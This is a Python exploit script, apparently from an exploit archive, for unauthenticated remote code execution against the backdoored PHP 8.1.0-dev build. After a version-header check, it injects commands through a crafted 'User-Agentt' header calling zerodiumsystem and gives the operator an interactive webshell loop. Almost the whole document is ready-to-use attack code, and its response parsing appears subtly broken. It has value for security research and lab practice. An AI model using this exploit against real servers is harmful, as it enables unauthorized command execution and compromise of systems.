#!/usr/bin/env python3 # Exploit Title: PHP 8.1.0-dev WebShell RCE (Unauthenticated) # Date: 2021-05-31 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.php.net/ # Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor # Version: PHP 8.1.0-dev # Tested on: Kali GNU/Linux 2020.3 # Author website: https://coldfusionx.github.io # Author email: coldfusionx@outlook.com # Detailed POC: https://github.com/ColdFusionX/PHP-8.1.0-dev_WebShell-RCE import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="PHP 8.1.0-dev WebShell RCE by ColdFusionX", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : ./exploit.py -l http://127.0.0.1 [^] WebShell=- id OR [^] WebShell=- whoami ''')) parser.add_argument("-l","--url", help="PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)") args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -l [url]") sys.exit() # Variables Host = args.url r = requests.session() ## Use this for Proxy #r.proxies.update( { 'http':'http://127.0.0.1:8080' } ) def svcheck(): verify = r.get(f'{Host}') if (verify.headers['X-Powered-By'] == 'PHP/8.1.0-dev') : print("Target is running on PHP 8.1.0-dev\n") return True def exec(): headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'User-Agentt' : f'zerodiumsystem("{Command}");' } door = r.get(f'{Host}', headers = headerscontent, allow_redirects= False) resp = door.text.split("")[0] if (resp == ""): print() print("Invalid Command") print() else: print() print(resp) if __name__ == "__main__": print ('\n[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX \n ') try: if svcheck() == True: print("*Shoot your commands below* \n") try: while True: Command = input("[^] WebShell=- ") exec() except: print("\r\nExiting.") sys.exit(-1) except Exception as ex: print('Invalid URL or Target not Vulnerable')